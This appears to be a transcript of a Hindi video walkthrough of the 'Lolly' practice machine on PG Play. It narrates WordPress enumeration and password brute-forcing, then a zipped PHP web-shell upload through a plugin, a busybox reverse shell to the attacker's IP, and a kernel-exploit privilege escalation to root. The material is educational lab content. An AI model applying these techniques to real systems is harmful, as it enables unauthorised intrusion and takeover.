हेलो एवरीवन, वेलकम बैक टू सेल्सएकॉप्स। और आज हम करने वाले हैं पीजी प्ले की एक और नई मशीन जिसका नाम है लॉली। सो हम स्टार्ट करते हैं। पहले हम अपना nmap रिजल्ट रीड कर लेते हैं। सो कैट nmap डॉट स्कैन। ओके। सो यहाँ पे हमारे सिर्फ एक पोर्ट एक्टिव है, पोर्ट नंबर 80, जिसमें रन कर रहा है HTTP। सो हम चेक कर लेते हैं हमारे HTTP में क्या रन कर रहे हैं। ओके, सो वेलकम टू nginx। if you say page this page the nginx server is successfully installed and working। ओके, सो हम इसका सोर्स कोड चेक कर लेते हैं। ओके, सो हमें सोर्स कोड में कुछ मिला नहीं। सो हम डायरेक्टरी फजिंग करते हैं, फफ का यूज़ करते हैं, फफ -c फॉर कलर, -w फॉर वर्डलेस, यूजर शेयर वर्डलेस, डबस्टर, डायरेक्टरी 2.3 मीडियम डॉट टी एंड हम दे देंगे हमारा URL HTTP, हमारे बॉक्स की IP, एंड हम करेंगे फज, फिल्टर कोड करेंगे 404, एंड साथ में हम दे देंगे कुछ एक्सटेंशन डॉट PHP, डॉट TXT एंड डॉट HTML। सो स्टार्ट करते हैं। जब तक हमारा ये डायरेक्टरी फजिंग चल रही है, ओके, सो वर्डप्रेस रन कर रहा है, तब तक मैं रोबोट डॉट TXT भी चेक कर लेता हूँ। ओके, सो रोबोट डॉट TXT एंड नॉट फाउंड। सो हम तब तक वर्डप्रेस को देख लेते हैं। ओके, सो थोड़ा टाइम लग रहा है पेज को लोड होने में। ओके, सो हमारा पेज लोड हो गया एंड ये पूरी तरीके से लोड नहीं हुआ है कुछ। सो हम लॉगिन चेक कर लेते हैं। सर्वर स्लो है साइट का। ओके, सो वी आर हैविंग ट्रबल फाइंडिंग दैट साइट। ओके, सो आपने अगर मेरे पुराने वॉक थ्रूज देखे हैं तो आपको पता होगा कि ये एरर क्यों आ रहा है, सर्वर को प्रॉब्लम क्यों हो रही है। बेसिकली जिसको नहीं पता मैं वापस बता देता हूँ। सो जो हमारी IP है वो एसोसिएट नहीं है इस डोमेन नेम के साथ। बेसिकली क्या हो रहा है कि जब भी ये डोमेन नेम सर्च कर रहा है और ये सर्वर के पास जा रहा है, तो सर्वर के पास डोमेन नेम से एसोसिएटेड कोई भी IP नहीं है DNS रिजोल्यूशन के वक्त। सो ये प्रॉब्लम हो रही है उसको ये ढूंढने में। तो एक काम करते हैं, हम अपने HC होस्ट में ऐड कर लेते हैं। सो एको हमारे डोमेन नेम एंड मशीन की IP। एंड यूज़ करते हैं पाइप सुडो TE का यूज़ करेंगे, -a। TE बेसिकली एक एडिटर है और -a अपेंड कर देगा इसमें HC होस्ट में। ओके, सो ये अपेंड हो चुका है, हम चाहे तो देख भी सकते हैं। कैट सॉरी सुडो कैट HC होस्ट। सो ये ऐड हो चुका है। सो बेसिकली अब क्या होगा, अब जैसे ही हम ये रिक्वेस्ट सर्च करेंगे, सो ये lolly डॉट LC की रिक्वेस्ट जाएगी, वो पहले हमारे HC होस्ट से होते हुए जाएगी और वहाँ पे उसको अपना IP एड्रेस मिल जाएगा, तो वो डायरेक्ट सर्च करेगा। ओके, सो अब हमारा पेज लोड हो रहा है कंप्लीट एंड हम जाते हैं लॉगिन में। सो सबसे पहले डिफ़ॉल्ट एडमिन एडमिन। ओके, सो हमारा वर्डप्रेस रन कर ही रहा है तो हम WP स्कैन का यूज़ करते हैं। सो हम करेंगे WP स्कैन हाइफन इन्यूमरेट। और क्या इन्यूमरेट करेंगे, हम करेंगे यूज़र हाइफन URL एंड हमारा URL है
सो हमारा वर्डप्रेस का इन्यूमरेशन चालू हो चुका है एंड हमें एक यूज़र मिला है लॉली। ओके, सो सिर्फ एक ही यूज़र मिला है लॉली, तो हम इसके लिए ब्रूट फोर्स अटैक चालू करते हैं। सम -u lolly -p user share word list rocky.txt। ओके, सो अगर हमें लॉली का कोई पासवर्ड मिलता है देन हम लॉगिन करके कंटिन्यू करेंगे। अगर नहीं मिलेगा सो हम फिर इन्यूमरेट करेंगे वल्नरेबल प्लगइन्स के लिए एंड देखते हैं कि कोई प्लगइन्स। ओके, सो हमें हमारे लॉली का पासवर्ड मिल चुका है, सो बेसिकली फर्नेंडो, एंड हम लॉगिन कर लेते हैं लॉली फर्नेंडो एंड करेंगे। ओके, सो एडमिनिस्ट्रेशन email verification। okay, so that email is correct। सो जो लॉली है वो एडमिनिस्ट्रेटर है। एंड हम वर्ड तब तक देख लेते हैं हमें कुछ और फजिंग में मिला है डायरेक्टरी। ओके, सो फजिंग में अभी तक हमें कुछ नहीं मिला है, हम इसको करते हैं कैंसिल और वर्डप्रेस डायरेक्टरी के लिए करते हैं। ओके, सो हमारी वर्डप्रेस डायरेक्टरी की फजिंग चालू हो गई तब तक। ओके, सो हम लॉली ओके, सो वी आर लॉली एंड देखते हैं थीम्स। प्लगइन्स। ओके, ऐड रोटेट। और ये तो डिफ़ॉल्ट प्लगइन है, एक बार इसके बारे में चेक कर लेते हैं। वर्डप्रेस। So WordPress management plugin used to create, schedule, rotate and track ads। ओके, सो वल्नरेबल है प्लगइन, चेक करते हैं। जनरल इन्फो, हम वर्जन वगैरह देख लेते हैं। ओके, सो हमें कुछ डायरेक्टरीज मिली है, index.php, wp content, wp login.php, license.txt, wp include। सो बेसिकली ये आधे से ज़्यादा वर्डप्रेस की ही डायरेक्टरीज है। ओके, मैनेज शेड्यूल, मैनेज मीडिया। ओके, सो अपलोड न्यू फाइल, हम यहाँ कोई फाइल अपलोड कर सकते हैं। एक्सेप्टेड फाइल्स हमें दे रखी एक्सटेंशन। Important, make sure your file have no spaces or special character in the name, replace space with this zip file are automatically extracted, okay, in the location where they are uploaded and the original zip file will be deleted once extracted। so हम ट्राई कर सकते हैं, अगर ये zip फाइल एक्सट्रैक्ट कर रहा है ऑटोमेटिकली, सो हम एक शेल बनाते हैं, ऑफ कोर्स अपना रिमोट कोड एग्जीक्यूशन का सेल, और उसको zip फाइल के अंदर डाल के अपलोड करते हैं और ये ऑटोमेटिकली उसे एक्सट्रैक्ट करेगा। और कैसो लोकेशन भी हमें पता है, सो हम इस लोकेशन में जाके अपनी फ़ाइल को एक्सेस करके ट्राई कर सकते हैं कि हम आरसी ही कर सकते हैं या नहीं। ओके, सो मैं आपको एक बात बताता हूँ। बेसिकली जब भी हम फाइल अपलोड करते हैं और चेक करते हैं रिमोट कोड एग्जीक्यूशन का, सो बेसिकली मेरा ये 3 प्रोसेस मैं फॉलो करता हूँ। फर्स्टली कि क्या मैं फ़ाइल अपलोड कर सकता हूँ तो कौन सा एक्सटेंशन की फ़ाइल अपलोड कर सकता हूँ। दूसरा, वो कहाँ लैंड हुई,
ओके, किस लोकेशन में जाके वो फाइल पहुंची, सेकंड, एंड थर्ड कि वो फाइल हैंडल कैसे हो रही है। आप अगर एक रिवर्स शेल या फिर एक कमांड शेल की फाइल अपलोड कर दे रहे हो, इसका मतलब ये नहीं है कि वो एग्जीक्यूट होके आपको रिवर्स शेल ही दे देगा। वो फाइल कैसे हैंडल होती है वो ज़रूरी नहीं है कि वो हमेशा आपको शेल ला के दे। सो वी कैन ट्राई। सो मैं ट्राई कर लेता हूँ। ओके, सो वी क्रिएट अ शेल, हम एक शेल क्रिएट करते हैं एंड gedit का नाम डालते हैं shell डॉट पी एच पी। ओके, एंड पी एच पी पास थ्रू get cmd एंड करेंगे टर्मिनेट, सेव, एंड अब इसको हम जिप में कन्वर्ट कर देंगे। तो जिप, जिस फाइल में हमें कन्वर्ट करना है shell डॉट जिप, एंड जिस फाइल को करना है shell डॉट पी एच पी। सो अब हमारी shell डॉट जिप रेडी हो चुकी है। अब हम इसे अपलोड कर देते हैं। सो क्रिएट ब्राउज एंड होम बॉक्सेस pg play lolly shell डॉट जिप एंड अपलोड। और ये कहाँ जाके अपलोड हो रही है? बैनर्स में। सो कॉपी वर्डप्रेस, और हमको पता है ये कहाँ होगी, WP कंटेंट, कंटेंट के अंदर बैनर, एंड अपनी शेल डॉट पी एच पी नॉट जिप, बिकॉज वो जैसे कि उसने बताया वो ऑटोमेटिकली एक्सट्रैक्ट करेगा और जिप फाइल को डिलीट कर देगा। सो चेक करते हैं, cmd इक्वल्स टू id। ओके, सो हमारा रिमोट कोड एग्जीक्यूशन सक्सेसफुल रहा। एंड हम चेक करते हैं विच, अब हमारा नेक्स्ट स्टेप क्या है? रिवर्स शेल लेना। सो बिजी बॉक्स चेक करता हूँ मैं। ओके, सो बिजी बॉक्स है। अब हम करते हैं अपनी रिवर्स शेल का जुगाड़। रेव शेल, हमारी IP 192.168.45.154, एंड हमारी रिवर्स शेल किस पोर्ट में आएगी? तो 4444 होता है, बिन बैश एंड बिजी बॉक्स। तो करते हैं कॉपी एंड करते हैं पेस्ट। हम इसको URL इनकोड भी कर सकते हैं, मैं हमेशा करता हूँ पर आज नहीं कर रहा हूँ। एंड हम अपनी लिसनर एक्टिव कर लेते हैं। एंड करते हैं अपनी एग्जीक्यूट कमांड को, एंड हमको रिवर्स शेल मिल चुकी है। अब हम लेते हैं TTY इंटरएक्टिव शेल, case OLS shell.php cd ls cd ls cd। ओके, सो हमें लोकल डॉट टी मिला, कैट लोकल डॉट टी। सो हमें लोकल फ्लैग मिल चुका है अपना। हम चले जाते हैं होम में। प्लस ओके, सो हमारा एक ही यूज़र है, लॉली cd lolly ls। ओके, सो लॉली में कुछ भी नहीं है। ओके, सो अब स्टार्ट करते हैं प्रिविलेज एस्केलेशन। अब प्रिविलेज एस्केलेशन के लिए सबसे पहले हम sudo -l ट्राई करते हैं, www data के लिए। ओके, सो हमें पासवर्ड की ज़रूरत है।
ओके 3 टाइम इन कंट्रैक्टेड अटेम्प्ट एंड हम फाइल्स देख लेते हैं कुछ इंपॉर्टेंट। हम चले जाते हैं एचसी में, देखते हैं पासवर्ड फाइल हम रीड राइट कर सकते हैं कि नहीं। ओके सो वी कैन ओनली रीड पासवर्ड फाइल ls-la। देखते हैं कुछ। ओके सो ये देखना भी बहुत ज़रूरी है, यहाँ पे सारी फाइलें रूट रूट या रूट शेडो होनी चाहिए। उसके अलावा अगर कोई यूज़र ने बाइनरी डाली है तो हम उसका यूज़ कर सकते हैं। ओके सो ऐसा कुछ भी नहीं है। हम चले जाते हैं लॉग्स पढ़ने, सी डी वेर डब्ल्यू सी डी लॉग ओके सो ऑथ लॉग। पहले परमिशन चेक करते हैं। ओके सो हम रीड नहीं कर सकते लॉग्स, हम ये रीड कर सकते हैं और इनको रीड करके कोई फ़ायदा नहीं है। सो ओके जब वर्ड प्रेस चल रहा था तो वर्ड प्रेस की कॉन्फ़िगरेशन फाइल देख सकते हैं। ls cd www ls cd html cd wordpress ओके सो config.php लेट्स सी कुछ मिले। ओके सो हमें यहाँ एक पासवर्ड मिला है, लॉली इज़ अ ब्यूटीफुल गर्ल, और पासवर्ड मिला है तो ट्राई कर सकते हैं। लॉली पे नाम से भी मैच कर रहा है। ओके सो वी आर लॉली। अब सबसे पहला sudo -l। ओके सो यूज़र लॉली मे नॉट रन sudo on ubuntu। ओके सो चेक करते हैं प्रोसेस रनिंग एज रूट, grep root। ओके बेन सो इसमें कोई काम की नहीं है हमारी। सो हम चेक कर लेते हैं suid फाइंड परमिशन 4000 एंड रिडायरेक्ट करते हैं devnel में एरर को। ओके सो ओके कुछ नया नहीं है। अब हम चेक कर लेते हैं cron job cat etc cron tab। ओके सो cron टैब में भी कुछ नहीं है। अब हम चेक कर लेते हैं कर्नल एक्सप्लॉइट। ओके सो बेसिकली मैं ये सारी चीज़ें करने के बाद कर्नल एक्सप्लॉइट ट्राई करता हूँ। अगर मुझे कुछ नहीं मिलता है तो लास्ट ऑप्शन कर्नल का ही होता है। सो सर्च एक्सप्लॉइट फोर पॉइंट। ओके सो एक्सप्लॉइट है, सो हम यूज़ कर लेते हैं लिनक्स का एक्सप्लॉइट सजेस्टर एंड मुझे था सी डी यूजर शेयर लिनक्स एक्सप्लॉइट सजेस्टर एंड चालू करता हूँ अपना पाइथन सर्वर python 3-m http.server पोर्ट 8080। एक मिनट कंट्रोल फाइल तो चेक ओके है। हम चले जाते हैं टेम्प में wget http 192.168.45.154 पोर्ट 8080 में
and les.sh file name. Okay, correct. So ls chmod plus x ls.sh and ओके सो हमारा एक्सप्लॉइट सजेस्टर रन हो गया है एंड सबसे पहला एक्सप्लॉइट जो उसने दिया है सो हम यहाँ से डाउनलोड कर सकते हैं यूआरएल है एंड ये कर्नल 4.4.0 89 जेनेरिक तक है सो इसको हम डाउनलोड कर लेते हैं ओके इसको किया कॉपी ओके सो हमारे फाइल हुई डाउनलोड पाइथन सर्वर करते हैं बंद cd होम डाउनलोड्स cd होम where is download okay see shell check ops and downloads ओके सो हमारी ये फाइल है 450 सो हम अपना रिवर्स शेल सॉरी पाइथन सर्वर चालू करते हैं पाइथन 3-m cdb.server पोर्ट 8000 में कॉपी .c ओके करते क्लोज कैट हमने रीड नहीं किया सो रन कैसे करना है ओके सो डायरेक्ट हमें इसको कंपाइल कर देना है बस सो जीसीसी 450 ओके सो कंपाइल हो गया chmod इसको कराते हैं एग्जीक्यूशन परमिशन एंड करते हैं रन id ओके सो वी आर रूट हमारा एक्सप्लॉइट रन कर गया और हमें रूट मिल गया सो ये कर्नल एक्सप्लॉइट था सो हम proof.txt रीड कर लेते हैं ओके सॉरी कैट ओके सो हमें proof.txt भी मिल गया सो हमने दोनों फ्लैग रीड कर लिए एंड वी हैव रूट एक्सेस सो ये मशीन यहीं पे एंड होती है थैंक यू फॉर वॉचिंग माई वॉक थ्रूज एंड प्लीज़ डू लाइक शेयर एंड सब्सक्राइब एंड मिलते हैं नेक्स्ट वॉक थ्रू में तब तक के लिए गुड बाय एंड टेक केयर